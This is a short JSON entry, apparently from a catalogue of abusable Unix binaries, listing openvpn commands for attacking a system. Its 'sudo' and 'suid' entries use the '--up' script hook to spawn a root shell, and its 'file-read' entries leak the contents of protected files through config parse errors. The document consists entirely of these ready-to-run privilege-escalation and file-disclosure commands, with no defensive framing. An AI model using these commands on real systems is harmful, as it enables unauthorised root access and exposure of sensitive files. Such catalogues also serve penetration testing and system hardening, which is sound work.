{ "functions": { "file-read": [ { "description": "The file is actually parsed and the first partial wrong line is returned in an error message.", "code": "openvpn --config \"[file]\"\n" } ], "suid": [ { "code": "./openvpn --dev tun0 --script-security 2 --up '/bin/sh -p -c \"sh -p\"'\n" }, { "description": "The file is actually parsed and the first partial wrong line is returned in an error message.", "code": "./openvpn --config \"[file]\"\n" } ], "sudo": [ { "code": "sudo openvpn --dev tun0 --script-security 2 --up '/bin/sh -c sh'\n" }, { "description": "The file is actually parsed and the first partial wrong line is returned in an error message.", "code": "sudo openvpn --config \"[file]\"\n" } ] } }